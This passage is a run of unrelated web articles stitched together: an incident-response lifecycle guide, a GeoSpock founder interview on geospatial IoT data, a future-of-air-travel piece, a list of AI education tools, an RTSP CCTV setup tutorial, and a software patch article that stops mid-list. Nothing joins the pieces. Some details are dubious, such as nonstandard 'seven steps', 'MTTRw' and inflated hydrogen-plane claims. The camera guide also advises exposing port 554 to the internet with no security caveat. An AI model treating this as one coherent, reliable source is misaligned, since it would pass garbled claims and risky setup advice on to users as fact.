- Detection and analysis
- Containment, eradication, and recovery
- Follow-up activities post-incident

These stages are essential in addressing the situation after an incident occurs. Each element has a crucial part in overseeing a cybersecurity incident.
The key elements of incident response are:

- Preparation: establishing policies, procedures, and resources for incident response.
- Detection and analysis: identifying and analysing security incidents.
- Containment, eradication, and recovery: isolating and removing threats, restoring systems, and recovering data.

These elements work together to effectively manage and respond to cybersecurity incidents according to the NIST incident response lifecycle. Post-incident activity involves conducting a review after an incident, documenting lessons learned, and updating response plans. These components, such as clear action steps, roles, and responsibilities, are significant in an effective incident response strategy, as they help prevent chaos during a breach and minimise damage, recovery time, and costs.

Preparing for Cybersecurity Incidents

Preparation, being the initial step in the NIST incident response lifecycle, holds a central position in managing cybersecurity incidents. It involves developing an effective incident response plan, building a dedicated incident response team, and conducting training and simulation exercises to prepare the team for potential security incidents.

The main goals of simulation exercises encompass:

- Evaluating the effectiveness of incident response plans
- Identifying weaknesses in response capabilities
- Testing the resilience of the organisation's incident response plan amid emergency scenarios

These proactive measures help organisations be ready for potential security incidents and minimise the potential damage.

Developing an Incident Response Plan

An incident response plan serves as an extensive scheme detailing the organisation's response to security incidents. Essential components of an incident response plan comprise:

- Formal documentation of roles and responsibilities
- Incident detection and analysis
- Incident containment and eradication
- Post-incident review and lessons learned
- Routine plan updates

To develop an effective incident response plan, follow these steps:

- Establish a policy
- Form an incident response team and define their responsibilities
- Conduct tabletop exercises

By following these steps, you can ensure that your organisation is prepared to respond to any incidents that may occur. The plan should also include contact information for all incident response team members and establish a formal incident response capability.

Building an Incident Response Team

Establishing a committed incident response team is imperative for administering cybersecurity incidents. Such a team ensures a coordinated and efficient response to incidents, thereby minimising the impact and reducing the time to recover. In fact, having multiple incident response teams can further enhance an organisation's ability to handle complex cybersecurity incidents.

The key responsibilities of the members of an incident response team include ensuring timely response to incoming tickets, phone calls, and tweets; providing leadership; conducting investigations; managing communications; handling documentation; and providing legal representation. Moreover, team members are tasked with analysing the root causes of incidents and implementing preventive measures to avoid similar events in the future.

Training and Simulation Exercises

Conducting training and simulation exercises is indispensable to ready the incident response team for actual incidents.
These exercises provide substantial advantages, such as:
- Acquiring experience in a secure environment
- Assessing organisational preparedness
- Boosting morale and fostering team unity
- Fulfilling regulatory obligations
- Improving response capabilities
- Enhancing team cooperation

Simulation exercises enhance the effectiveness of the incident response team by stress-testing plans and systems. They facilitate the testing of response plans, tools, and procedures, which helps identify gaps and provides a deeper understanding of the incident response process.

Detection and Analysis of Security Incidents

The detection and analysis phase of the incident response lifecycle entails recognising and evaluating potential threats. Various monitoring systems and tools play a crucial role in this stage: they assess network traffic patterns, scrutinise logs and events, monitor dark web sites and ransomware activity, and recognise activity patterns that suggest compromise.

Threat intelligence is another crucial aspect of this stage. It offers essential insights that facilitate faster and more efficient decision-making, consequently diminishing response times and mitigating the consequences of cyber incidents. It also improves comprehension of the threat landscape, which in turn improves risk management.

Monitoring Systems and Tools

Effective monitoring solutions, such as dark web monitoring software, are crucial for detecting and analysing security incidents. Monitoring systems contribute to detection and analysis by assessing network traffic patterns, scrutinising logs, events, and activities, and recognising activity patterns that suggest compromise. Efficient monitoring tools for identifying cybersecurity incidents include Security Information and Event Management (SIEM) tools such as IBM QRadar, ArcSight, and LogRhythm, as well as SolarWinds Threat Monitor.

Threat Intelligence and Data Analysis

Threat intelligence holds a significant position in recognising and comprehending potential threats. It provides insights that enable faster and more efficient decision-making, resulting in decreased response times and minimised impact. Along with its risk management advantages, it helps in discerning false positives and prioritising alerts, enabling informed security decisions based on data. Bodies such as NIST, ISO, and ISACA all publish guidance on using such intelligence within the incident response lifecycle.

Threat intelligence is acquired through a diverse range of data sources and automated tools, including artificial intelligence and machine learning, which correlate disparate information and identify patterns. This process transforms raw threat data into actionable intelligence, which is crucial for the analysis of, and response to, security incidents.
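To make the detection stage more concrete, here is a minimal sketch of the kind of rule a monitoring tool might apply: a Python script that flags bursts of failed logins in an authentication log. The log path, log format, and threshold are assumptions for illustration; real SIEM tools such as those named above implement far richer correlation.

import re
from collections import Counter

# Toy detection rule: flag source IPs with repeated failed logins.
# The path and line format assume a Linux host running sshd; the
# threshold of 5 is an arbitrary value chosen for illustration.
FAILED_LOGIN = re.compile(r"Failed password for .+ from (\d{1,3}(?:\.\d{1,3}){3})")
THRESHOLD = 5

def scan(log_lines):
    failures = Counter()
    for line in log_lines:
        match = FAILED_LOGIN.search(line)
        if match:
            failures[match.group(1)] += 1
    # Keep only the IPs whose failure count suggests a brute-force attempt.
    return {ip: n for ip, n in failures.items() if n >= THRESHOLD}

with open("/var/log/auth.log") as log:
    for ip, count in scan(log).items():
        print(f"ALERT: {count} failed logins from {ip} - investigate")

In a real deployment this logic would run continuously and feed alerts into the alarm and ticketing systems described above, rather than printing to a console.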
Containment, Eradication, and Recovery

The containment, eradication, and recovery phases of the incident response lifecycle concentrate on lessening the effect of a security incident and restoring regular operations. The containment stage involves identifying and removing malware, vulnerabilities, or unauthorised access, as well as verifying system cleanliness and security. The eradication stage follows containment and implements a permanent solution to prevent similar incidents in the future; the goal here is to remove the root cause of the security incident with a high level of certainty.

Containment strategies play a critical role in managing cybersecurity incidents. They involve:
- Preparing systems and procedures
- Promptly identifying security incidents
- Containing incident activities and attackers
- Progressing towards eradication and recovery

To select the optimal containment strategy for a specific cybersecurity incident, assess the potential impact of the incident, the necessity of sustaining essential services, and the available resources. Effective containment strategies in practice may involve isolating affected systems, disconnecting them from the network, and implementing strict access controls to limit the impact of the incident.

Eradication and System Restoration

The eradication stage of incident response entails removing threats and restoring affected systems to their original state. Fundamental procedures for eliminating threats include removing malware, identifying the root cause of the attack, and implementing measures to prevent future attacks. Ensuring the integrity of a system after restoration involves:
- Maintaining data integrity in the communication infrastructure
- Implementing rapid detection, repair, and recovery strategies for lost data
- Classifying integrity assurance mechanisms into preventive steps
- Rigorously maintaining the hardware and operating system environment
- Validating inputs to safeguard data integrity

Recovery and Business Continuity

The recovery stage emphasises the importance of a well-documented recovery process to minimise downtime and ensure business continuity. Backups and redundancies play a crucial role here: redundant power and internet connections enable businesses to resume operations after failures, and data backups are essential for mitigating the risk of data loss. During the recovery phase, it is essential to test the systems that were repaired, replaced, or reinforced in the eradication phase, to verify their security and proper functionality.

Post-Incident Review and Improvement

The post-incident review phase holds substantial importance in the incident response lifecycle. It enables those involved in incident handling to analyse the event, comprehend its causes, and derive valuable lessons that enhance future incident response capabilities. This thorough examination contributes to heightened comprehension of, and readiness for, subsequent incidents. Steps such as lessons learned meetings, incident documentation, and post-incident reporting are vital to learn from the experience and enhance the organisation's security stance; they allow organisations to identify areas for improvement and to pinpoint vulnerabilities and deficiencies in their defences.

Lessons Learned Meetings

Lessons learned meetings are an important aspect of the post-incident review phase. They serve as a platform for analysing the causes of, and underlying reasons for, the incident and for pinpointing deficiencies in organisational security practices, which helps reduce the likelihood of similar incidents in the future. These meetings should cover response effectiveness, communication gaps, and root cause analysis. It is advisable to schedule the meeting within a week of resolving the incident and to include all relevant participants.

Incident Documentation and Reporting

Incident documentation and reporting are equally important aspects of the post-incident review phase.
Documenting and reporting cybersecurity incidents ensures that the details of the event are recorded, enabling an effective response to the incident and serving as a learning tool for the organisation to prevent future security breaches. An incident report should generally include the details of the incident: its timing, how it occurred, its impact on affected entities, and its extent.

Continuous Improvement and Plan Refinement

After a security incident has been managed, it is important to continually improve and refine the incident response plan. Organisations should review and refine their incident response plan regularly, at least every six months and ideally quarterly, to ensure that it remains effective against evolving threats. Strategies to improve an incident response plan include:
- Conducting simulated incident scenarios
- Measuring performance metrics such as mean time to detect (MTTD), mean time to respond (MTTR), and MTTRw during exercises (see the sketch after this list)
- Focusing on primary attack scenarios
- Integrating elements such as preparation, threat identification, containment, and elimination
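As a rough illustration of those metrics, the sketch below computes MTTD and MTTR from a handful of incident timestamps. The record structure is hypothetical; in practice these figures come from your ticketing or SIEM platform.

from datetime import datetime
from statistics import mean

# Hypothetical incident records; real timestamps would come from
# your incident tracking system.
incidents = [
    {"occurred": datetime(2024, 3, 1, 9, 0),
     "detected": datetime(2024, 3, 1, 9, 40),
     "resolved": datetime(2024, 3, 1, 14, 0)},
    {"occurred": datetime(2024, 3, 8, 22, 15),
     "detected": datetime(2024, 3, 9, 7, 0),
     "resolved": datetime(2024, 3, 9, 12, 30)},
]

def hours(delta):
    return delta.total_seconds() / 3600

# MTTD: average gap between an incident occurring and being detected.
mttd = mean(hours(i["detected"] - i["occurred"]) for i in incidents)
# MTTR: average gap between detection and resolution.
mttr = mean(hours(i["resolved"] - i["detected"]) for i in incidents)

print(f"MTTD: {mttd:.1f} hours, MTTR: {mttr:.1f} hours")

Tracking these numbers across successive exercises gives a simple, objective measure of whether plan refinements are actually improving response performance.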
Choosing the Right Incident Response Framework

Selecting an appropriate incident response framework is a critical element of handling cybersecurity incidents. The NIST Incident Response Framework offers advantages such as:
- Improved communication and decision making
- An enhanced security posture
- Prevention of reputation damage
- Systematic incident response
- Better protection of critical infrastructure
- Ongoing protection from cyber threats
- A comprehensive approach to handling security incidents

When selecting an incident response framework for a small business, it is crucial that the guidance covers the full lifecycle, from detection through to eradication of incidents. For large corporations, it is important to consider frameworks from reputable sources such as NIST, ISO, and ISACA.

In conclusion, mastering the incident response lifecycle is crucial for organisations to effectively manage and mitigate cybersecurity incidents. From planning and preparation, through detection, containment, eradication, and recovery, to post-incident review and improvement, each stage plays a pivotal role in minimising the impact of security breaches and maintaining business continuity. The choice of incident response framework, whether NIST, SANS, or another, depends on an organisation's specific needs and resources. With a well-defined lifecycle, proactive measures, regular training, and continuous improvement, organisations can stay ahead of evolving cyber threats and ensure the security of their digital assets.

Frequently Asked Questions

What are the 7 steps of incident response?
The 7 steps of incident response are Preparation, Identification, Containment, Eradication, Recovery, Learning, and Re-testing. These steps offer a well-structured approach to managing cybersecurity threats effectively.

What is SANS SEC504?
SANS SEC504 is a course that covers hacker tools, techniques, and incident handling, providing skills for conducting incident response investigations and developing threat intelligence to mount effective defence strategies. It serves as an introduction to the worlds of penetration testing and incident response.

Why is having a well-defined incident response lifecycle important?
A well-defined incident response lifecycle improves cybersecurity practice by providing a systematic framework for identifying and responding to security threats, reducing the impact of cyber incidents, and facilitating strategic detection and management of attacks. It helps organisations handle security incidents effectively and minimise their impact on operations.

What are some effective strategies for containing a cybersecurity incident?
Effective strategies for containing a cybersecurity incident include preparation, prompt identification, containment of incident activities and attackers, and subsequent eradication and recovery.

What is the role of threat intelligence in the detection and analysis of security incidents?
Threat intelligence plays a crucial role in enabling faster decision-making, reducing response times, and mitigating the impact of cyber incidents. It also aids in better understanding the threat landscape to enhance risk management.
According to your bio, the technology behind GeoSpock actually started as an attempt to build a supercomputer that could mimic a human brain – tell us about that.

Way back before the company started, when I was doing my PhD at Cambridge, we were building a custom supercomputer architecture to carry out real-time simulation of human brain functions – trying to take the brain's hundred billion neurons and hundred trillion synapses, and compute them at the same rate as the brain does, which means everything must be updated every millisecond. At the time, approaches like Nvidia's graphics card solutions and IBM's Blue Gene took a compute-centric view of the problem – which meant throwing more hardware at it. What the brain can do in one second, the state of the art was taking two weeks to execute. Our research group realized that it was a communication problem, so we designed a communication-centric supercomputer with custom vector processors using FPGAs and high-speed serial links, and we were able to get the execution time down from two weeks to a single second, which is pretty cool.

I realized that shipping custom hardware wasn't a particularly scalable way to address the neuroscience problem, so I set about making biologically inspired, massively parallel architectures run purely in a software environment on commodity, standard server hardware. But the neuroscientists didn't have a brain-scale model to stress-test our machine with. We were probably two decades ahead of the market on that one.

So how did you go from that to applying geospatial technology to things like IoT-generated data and smart cities?

Around 2011-2012, I got very excited by the rise of smartphones and the fact that with every smartphone in our pocket, we would also have a GPS chip in our pocket. And then I started thinking about the future (or what the present is now) where it wouldn't be just GPS in the devices that we carried; it would be in the devices that we drove – millions of connected cars – and in the tens of millions of sensors in the physical environment allowing us to measure that environment.

Many of those will be static sensors – they don't necessarily have to have GPS chips, but the location still matters, because there's no point putting a sensor in the environment if you have no context as to where it is. A temperature reading means nothing unless you can tell me where that temperature is. Imagine a connected vehicle driving through a city. As it's moving, it is passing static sensors – IoT-connected streetlights, congestion-monitoring cameras, pollution monitors. A city that can dynamically manage congestion and street traffic needs knowledge of all the moving things and all the static things. So a static sensor still needs a location to give it context, maybe not for itself in isolation, but for the broader complete system.

Anyway, geospatial systems were built around the use case of digitizing paper maps, not tracking billions of moving objects and giving each one of them contextual intelligence on demand in a second. I realized that with all this knowledge of how you build custom supercomputers using commodity systems, part of the solution was there. So I decided to just go tackle it.

To clarify, it seems you've got two problems to tackle there – not just tracking all those components, but the extreme amount of data they generate, right?

Absolutely. By 2023, Gartner is predicting that we're going to be generating 54 exabytes of IoT data a year.
That’s more than the projected storage capacity that we’re going to manufacture. And they also predict that by 2035, we’re going to have a trillion connected IoT devices. The data that generates is going to be insanely large. And the biggest problem that we have in terms of data analytics is getting value from that data, especially in real time. Coming back to the congestion example, to monitor congestion, I need to know where every vehicle is in a city on a second-by-second basis. I need to know where they were over the past five minutes so I can see where congestion is emergent. I need to know historically whether that’s normal or unusual behaviour. And I need to be able to combine all of those things together in a second, because I need to know whether I can intervene to get better outcomes. The trouble with big data systems today when they’re reliant on the batch-processing model is that it may take two weeks to get an insight. So it’s always after-the-fact insights. And better luck next time, because when you measure the physical world, the likelihood of that scenario ever occurring exactly the same way again is close to zero. So our thing is to use geospatial data to enable people to understand contextual intelligence on the fly, in real time. And from that base point, then you can do AI modeling of future scenarios and then choose the one that you most want the world to look like so you can intervene and change the outcome for the better. And this is where we start getting into really intelligent city platforms, intelligent automated platforms, intelligent maritime platforms, things that can change the outcome and not just say, ‘Well, I should do it better next time.’ Also, our big thing is that we’re really good at de-siloing data. So when we go into a city – let’s use Cambridge as an example, because our headquarters is there – they have 86 different types of IoT sensors, connected buses, connected bus stops, smart streetlights, smart traffic lights, connected rubbish bins, microclimate, pollution sensors, ANPR [automatic number-plate recognition] cameras, Bluetooth flow control, all sorts. All of it is siloed, so it’s not very easy to draw new insights. We went in with our geospatial data platform, and we were able to de-silo that data, bring it home to one place, store it on AWS, then open that up for a programmatic API. And using SQL, we were able to basically turn that city into an innovation platform, so anyone can come along with a new question and just focus on extracting the value. Our ability to produce real-time value extraction – because we operate in seconds, not weeks – means you can ask new questions on the fly, unknown questions, and have them come back really quickly. So you’re actually doing all this on AWS – in the public cloud? Absolutely. We partner with AWS. We have dynamically scalable compute, and it’s really low-end compute, which allows us to just completely change the unit economics of these big data queries. And because we’re on AWS, we send our software to where the data is – shipping exabytes of data around for every new use case is expensive. So if they already have their data, we send our algorithms to where the data is, index it, and then open it up. The thing that’s going to scale the most is data, so we scale data the cheapest way possible: on S3. And the compute is right-sized, depending on the complexity of the question you’re asking. So the more complex the question, the more machines you spin up. So you can always get an answer in a second. 
What are some of the most interesting or unexpected insights that you have gathered from working with Cambridge, Singapore and other cities?

With smart cities, we're seeing a really big push in measuring automotive pollution output. However, 90% of the world's global trade is maritime, and those engines are big polluters as well. We're working with maritime too, so by being able to track that and combine that data with city data, we can suddenly start understanding where the pollution is coming from, who's causing it, and whether we can actually address those issues to help prevent climate change.

Our data platform separates the data production and the sensors to help bring it into one platform, then enables a million next-generation citizen services, city insights, new commercial opportunities, new services, and applications. So now we're seeing this disaggregation between application and data generation for the first time – data being repurposed. And that's actually a bigger thing – in the past, no one had the ability to do universal insight extraction, so they were focused on data sharing and data selling. We can't do that anymore – the data is too big. We have to get the insights where the data is being produced, and that's what our technology allows. So people can move away from a data-sharing model to an insight-sharing model, and that's actually a lot better. If you're an automotive manufacturer gathering an exabyte of data, you can't sell that to every city that you operate in – they don't know what to do with it. What they want to know is: is my road congested? That's a yes or no question if you can solve it in real time, right? So we shift the model to insights rather than data. People are much more willing to share insights – it helps protect privacy and allows commercially sensitive data to remain in a secure environment.

Moore's Law is going to come to an end at some point, so the amount of power required to crunch these huge amounts of data is going to be an issue. Do you think quantum computing is going to be the answer to that?

My take on quantum computing is that it produces a probabilistic output – you still have to take the output and put it into a conventional system. I see it as a bolt-on capability to the traditional compute model. So just like you have CPUs, GPUs and FPGAs, and now people are talking about neural processing units, you'll have quantum processing units. I don't think the framework of computation will be changed; I think it will be augmented with quantum. And quantum doesn't solve the data storage issue. However, the advent of solid-state technology is allowing us to store vast amounts of data more effectively than on a traditional magnetic storage medium like spinning disks, and it actually makes access to that data faster. You still have the issues of how to manage that data – where do I put it? How do I still get maximum performance in terms of data extraction? But there are advances. If we look at NVMe (non-volatile memory express) technology, which is flash-based storage, I see that as the next wave.
What will air travel look like in 2035 and beyond? Learn more about the latest trends in the aviation industry and how your flying experience will change over the next few decades.

Air travel has a reputation for being cramped, uncomfortable, and expensive, particularly at peak times. It's also a major contributor to the greenhouse gas emissions that cause climate change. But major changes to air travel are in development, so hopefully, in the next few decades, traveling by plane will get more affordable, more comfortable, and more environmentally friendly. Here are some of the ways the future of air travel is expected to change:

1. Hydrogen-powered planes. Aviation is currently responsible for 3.6% of the EU's greenhouse gas emissions because modern planes burn kerosene as fuel. A recent report suggested that hydrogen-powered planes could enter the market as soon as 2035, and those planes could carry hundreds more passengers per flight than traditional planes, with a cleaner energy source.

2. Going beyond traditional wing design. A blended wing design combines the wing and the fuselage into a single unit, so the entire aircraft provides the lift for the flight. Delta wings – like those used on the Concorde and high-speed military jets – may also be incorporated in some way into commercial planes. KLM is also working with Delft University of Technology on a 'Flying V' plane that has passenger cabins down each side of a V-shaped aircraft. The company claims this type of plane could offer 20% more fuel efficiency than the A350.

3. Futuristic cabin design. Airlines are constantly looking for ways to maximize the number of people they can put on each flight without sacrificing the comfort of the passengers. In the future, we may see improvements such as double-decker economy seats that promise more space for riders, paired with increased capacity for the airline.

4. Air taxis. Have you been longing to ride in a flying car that feels like it's straight out of Back to the Future or the Jetsons? Aviation companies are researching ways to shift local transportation from the road to the air with electrically powered 'air taxis' for short flights. In 2017, Volocopter completed its maiden flight for electrified individual air transport, and the Lilium Jet from Munich is reported to be able to fly 300 km in an hour. Its five-seater air taxi could start operating as early as 2025, and traveling by air taxi could become as common as traveling by subway is in major cities today. Autonomous air taxis may follow shortly after as the technology continues to evolve.

5. The return of supersonic flights. United plans to buy 15 new supersonic airliners and hopes to 'return supersonic speeds to aviation' by the year 2029. Previous supersonic passenger flights ended in 2003, when British Airways and Air France retired the Concorde. An aircraft flies supersonically when it travels faster than the speed of sound, which is approximately 660 mph (1,060 km/h) at an altitude of 60,000 ft (18,300 m).

6. Better in-flight entertainment. In-flight entertainment options of the future will include more screens, more gaming, and even the ability to take e-courses during your flight. Panasonic is also developing ways for passengers to improve wellness on flights by setting up lighting to regulate circadian rhythms on long-haul flights and by dampening cabin noise to promote better sleep. VR and AR companies are also eager to give travelers more immersive experiences on flights.
Alaska Airlines and British Airways have trialed SkyLight’s VR headsets in first-class cabins on selected routes. As the development of the metaverse continues, we'll likely see more opportunities for passengers to enjoy immersive experiences while flying.
The realm of education is experiencing a significant transformation, spearheaded by the integration of Artificial Intelligence (AI). Cutting-edge tools and applications are redefining how students learn and how educators teach. The crux of this progressive change rests on AI-driven applications that are designed to elevate the educational experience across various academic fields. From virtual assistants to interactive platforms, AI is not just an auxiliary force but a central feature in crafting an efficient and personalized educational journey for learners around the globe.

The benefits of these technological innovations are twofold: they streamline educational practices for greater efficiency, and they adapt to individual learners to improve the learning curve. As a result, the educational landscape is witnessing a bespoke evolution, one where technology is no longer just an add-on but a pivotal element in advancing modern education.

Personalized Assistance for Students and Educators

ChatGPT: The AI Study Companion

ChatGPT is not just another study tool; it's a virtual assistant that is revolutionizing the way students compile study materials and interact with content. Developed by OpenAI, this sophisticated tool uses AI to respond to user queries in real time, thereby acting as a round-the-clock study partner. With ChatGPT, students can navigate through complex concepts with ease and draft essays with an efficiency that couldn't have been imagined a decade ago.

DataBot: Enhancing Cognitive Skills

AI is not only about providing answers; it's also about fostering a deeper understanding. DataBot serves as a digital buddy that hones logical reasoning and fortifies memory. This unique tool employs AI to present information in a way that pushes students to think critically and remember effectively. In a world brimming with data, having an ally like DataBot ensures that students are not just consuming information but engaging with it meaningfully.

AI-Powered Learning and Evaluation

Formative AI: Tailoring Teaching Methods

Capturing the pulse of a classroom has always been a challenge, but Formative AI is changing the game. This innovative application illustrates AI's role in formative assessment by analyzing student performances and thereby helping educators curate customized teaching methods. It provides actionable insights that allow for a teaching approach that adapts to the proficiency and pace of each learner – a personalized educational experience that students of the past could only wish for.

Gradescope: Intelligent Grading Systems

The traditional grading system is undergoing a makeover with Gradescope. Using AI, it offers a grading mechanism that caters to a broad spectrum of subjects, easing the burden on educators and ensuring consistency and accuracy in evaluation. This platform exemplifies AI's potential to streamline processes that once consumed hours of an educator's day, thereby providing them with more time to focus on what truly matters: teaching.

Tools for Writing and Presentations

Grammarly: Advancing Communication Skills

Grammarly emerges as a standout in the suite of AI tools by automating the correction and enhancement of written works. By providing real-time suggestions on grammar, punctuation, and style, it empowers users to elevate their writing. Beyond just corrections, Grammarly also educates by expanding the user's vocabulary – invaluable for students and professionals alike, ensuring clarity and fluency in written communication.
PowerPoint Speaker Coach: Refining Presentation Skills For those who present, whether a student or a corporate professional, PowerPoint Speaker Coach is indispensable. Through AI, the Speaker Coach offers feedback on speaking pace and tone, prerequisites for powerful presentation delivery. This level of optimization is unheard of in traditional public speaking practice and could be the difference between a good presentation and a great one. Interactive Learning Platforms Quizlet and Socratic: Engaging Educational Ecosystems Quizlet and Socratic are leading the way as interactive learning platforms, offering a rich and engaging educational ecosystem. They use AI to provide a tailored learning experience, with tools for creating study sets and quizzes in Quizlet and a student-driven assistant in Socratic that answers questions and explains concepts. These platforms are making study sessions more interactive and reinforcing knowledge through the power of repetition and active engagement.
The RTSP protocol can be used to transmit images on CCTV systems and, thanks to its compatibility with a wide range of devices, it is a great option for hybrid projects. In this article, you will learn what the RTSP protocol is and how to use it with an IP camera, digital video recorder (DVR), or network video recorder (NVR).

What is the RTSP protocol?

RTSP is an acronym for "Real Time Streaming Protocol", meaning it was designed to send audio or video live from one device to another. This protocol was not created exclusively for CCTV; it was already used in other sectors where real-time transmission is needed, and it was adopted by video surveillance manufacturers and became a standard protocol.

The RTSP protocol for CCTV

Video surveillance manufacturers implement the RTSP protocol in their cameras, recorders, and software so that they are compatible with other devices available in the market. When purchasing an IP camera and a network video recorder from different manufacturers, you can have them communicate using this universal protocol. To configure the equipment it is necessary to find out which RTSP command to use; this information can be found in the product's manual or by consulting the manufacturer's technical support team.

How to use the RTSP protocol

Imagine that you have purchased an IP camera from Dahua (a Chinese manufacturer) and want to use it with a network video recorder (NVR) that you already own from a different manufacturer, such as Samsung. You should search the Dahua camera's manual for the RTSP command that should be used to stream video over the network. If you do not find this information in the product's manual, contact the manufacturer's technical support team, as it is essential to get the correct command so your equipment can communicate.

After obtaining this information, you must enter it into the recorder, which will then request video through this universal protocol. In practice, just open the NVR menu and input the RTSP command followed by the username and password of the IP camera; upon receiving this information, the camera will send a real-time video stream.

How to use the RTSP protocol for cloud recording

The principle for video recording in the cloud is the same: use the correct RTSP command to request that the camera send video to a server located somewhere on the Internet. The diagram below shows an IP camera installed on an internal network and connected to a router. You just need to set up the cloud recording server to send the RTSP command over the Internet, and as soon as the camera receives it, it starts streaming video.

In this example, the server simply sends the RTSP command over the Internet; upon reaching the external interface of the router, it is forwarded to the internal network where the camera is located. It is therefore necessary to configure the router with routing rules based on the network interfaces and communication ports.

How to test an IP camera with the RTSP protocol

Before trying to set up a CCTV system, it is worth making sure everything will work properly, and the best way to do this is through simple tests, such as connecting an IP camera to a traditional software player that uses the RTSP protocol. There is a well-known free program called VLC that can be used for such tests; the diagram below shows an example of how to use it.

In this example, an IP camera is connected to the router, which in turn is connected to a laptop that uses the VLC software to send the RTSP command to the camera. Everything is on the local network, so there is no need for routing rules (the devices are attached to the internal ports).

In the VLC software, just open the "Media > Open Network Stream" menu or type CTRL + N and paste the RTSP command for the IP camera. In our example, the IP of the camera is 192.168.2.107 and the RTSP port is 554, and this information must be entered in the command that is sent to the camera. The command in this case takes the form rtsp://192.168.2.107:554 (depending on the camera model, a stream path may follow the port; check the manual for the exact syntax).

After sending the command you can see the image from the IP camera directly on the laptop, which proves that the command used is correct and that the network connections and IPs are also correct. After this initial test it is possible to move on to more advanced tests and use a remote connection with IP camera recorders or cloud recording systems.
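If you prefer to script the same check instead of clicking through VLC, a few lines of Python with the OpenCV library can confirm that a camera answers an RTSP request. This is a minimal sketch: the credentials shown are placeholders, and the stream path after the port varies by manufacturer.

import cv2  # pip install opencv-python

# Same camera as in the VLC test; replace the credentials and add
# the stream path required by your camera model.
url = "rtsp://admin:password@192.168.2.107:554"

capture = cv2.VideoCapture(url)
ok, frame = capture.read()  # try to grab a single frame

if ok:
    print(f"Stream is up - received a {frame.shape[1]}x{frame.shape[0]} frame")
else:
    print("No video received - check the IP, port, credentials and RTSP path")
capture.release()

A script like this is handy when you are commissioning many cameras, since you can loop over a list of addresses instead of testing each one by hand.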
A practical example of using the RTSP protocol via the cloud

Let's talk about a practical example of using the RTSP protocol for CCTV. Imagine a situation where you have some analog security cameras connected to a digital video recorder (DVR) and your intention is to have redundant video recordings. You just need to choose a service that allows you to store everything on a server in the cloud (somewhere on the Internet). In this example I will use the services of Angelcam, which works with different device brands and also works well with the RTSP protocol.

==> For more details, I recommend reading the other article: CCTV camera cloud recording: Using online IP camera storage

Configuring the router to work with the cloud

Before doing the tests with the command in the cloud, it is necessary to configure the router. This procedure is extremely simple: just use the IP and port information of the IP camera. Basically, you have to tell the router that it should direct traffic coming from the Internet to the IP camera whenever the request is made to a particular logical port, which in the case of the RTSP protocol is 554 by default.

See the image below that shows the configuration of the router. Note that for this model the configuration must be made in the "Applications and games" menu; the IP camera address is 192.168.2.107 and the port is 554. On other router models you will have to look for different menus, usually under a name such as port forwarding or NAT.

How to configure the cloud server

A Dahua DVR can work seamlessly with this service because it allows the use of an RTSP command, and the information we need for configuration is available in the product's manual. In this specific case, the device is a 4-channel Dahua DVR that uses an RTSP command of the form rtsp://username:password@IP:554/cam/realmonitor?channel=1&subtype=0 (this is the format Dahua commonly documents; confirm it in your model's manual). Just use this command and replace the IP, port, user, and password information according to your network.

Everything must be configured on the server side of the cloud, and the routing rules must be ready on the router on your local network. See in the following image an example of how to configure the Angelcam cloud. After creating a platform account on the site https://angelcam.com, log in with your username and password and choose the option DVR and NVR.
After this step, simply type or paste the RTSP command as shown in the following image. Note that the command used includes the external IP used by the router and port 554, which was used in the router configuration and is the DVR default. It is important to understand the concept: the RTSP command sent by the cloud server arrives at the router through the external interface before being routed according to the established rules, so you must make sure you know the external IP used by the router. The following image shows the end result of the camera connection to the server in the cloud.

In some cases you will notice that the image may suffer quality variations due to factors such as an unstable Internet link, reduced available bandwidth, or command incompatibility between the cloud server and the camera. Be sure to upgrade the IP camera firmware to the latest version available; this helps maintain compatibility with systems that use RTSP, such as cloud services and recorders from other brands.

If you do not have a static IP on your Internet link

If you do not have a static IP on your Internet link, you can use a DDNS service available on the Internet, so the cloud service will continue to work and record the images from your camera even when the external IP of your router changes automatically.

How to find your IP camera's RTSP command

The simplest way to find the command used by your camera or recorder is to consult the product's manual. If this is not possible, contact your equipment supplier. If you still have problems, you can try the ONVIF Device Manager software, following the instructions in the article ONVIF Device Manager Review and Download (Test IP Cameras).

Now you know what the RTSP protocol is and how to test and use it in practical situations. I recommend that you run local tests with the VLC software and the devices you have on your network to familiarize yourself with the use of this protocol.

Want to learn more?

If you want to become a professional CCTV installer or designer, take a look at the material available in the blog.
According to TechTarget, a software patch is a "quick-repair job for a piece of programming designed to resolve functionality issues, improve security and add new features." Although similar to a hotfix, which users can apply without having to restart their software, a software patch updates a small component of the software to fix a bug or error discovered after the product launch.

As I'm sure you already know, there is no such thing as a perfect software program, so patches are very common, even many years after a program has been launched. The more popular a program is, the more likely it is that rare problems will surface, and so some of the most popular programs are also some of the most patched. So, we can say that a patch, commonly known as a fix, is a small piece of software used to redress a problem, generally called a bug or an error, within an operating system or software program.

Do You Need to Install Software Patches?

Although the main purpose of a software patch is to fix bugs, it can also address security vulnerabilities and instabilities in a piece of software. Turning a blind eye to these crucial updates can leave your devices open to the malware attacks the patch is intended to prevent. Some patches aren't so critical but are still important, adding new features or pushing updates to hardware drivers. So, to make it clear: avoiding patches will leave the software outdated, at greater risk of attack, and most likely incompatible with newer devices and software.

What's more, a software patch is extremely important because it confronts known vulnerabilities. When a vendor releases a security update, it alerts the hacker community that there's a vulnerability in that particular software. At that moment, attackers begin looking for unpatched copies of the software to exploit. Luckily for you, our Heimdal Patch & Asset Management ensures that hackers don't use these vulnerabilities to break into your corporate network. The sooner your organization installs a security patch, the more quickly it can protect itself against the associated vulnerability.

The Importance of Patch Management

It's also essential for both users and organizations to implement patch management. What is patch management? As previously explained in my colleague's patch management overview, it is a procedure that plays a significant role in ensuring strong organizational protection. For most users and their devices, effective patch management can be as simple as enabling automatic updates.

Nowadays, more and more organizations have implemented patch management policies that determine how to evaluate and apply software patches. These policies usually set the time frame within which IT must apply a patch and how to test it to ensure it will not cause compatibility issues for the organization.

So, why is it crucial to keep security patches up to date?

#1. It reduces the risk of cyberattacks

Most users perceive cyberattacks as an impossibility until they become a real threat. They feel like a cyberattack comes on the spur of the moment, without warning, but quite often a patch is available before cyber attackers manage to exploit a vulnerability and use it to infiltrate systems.

#2. It avoids the loss of productivity

It may seem unexpected, but another consequence of cyberattacks is the productivity loss that arises from system downtime.
In this regard, a cyberattack can result in two types of monetary losses: the cost of patching systems, and the cost of delayed projects and unproductive employees.

#3. It protects your data

Never underestimate the value of the data stored on your devices. Hackers can and will use personal information to gain access to as many systems as possible, especially if they obtain login information from someone who uses the same credentials for several services.

#4. It protects customer data

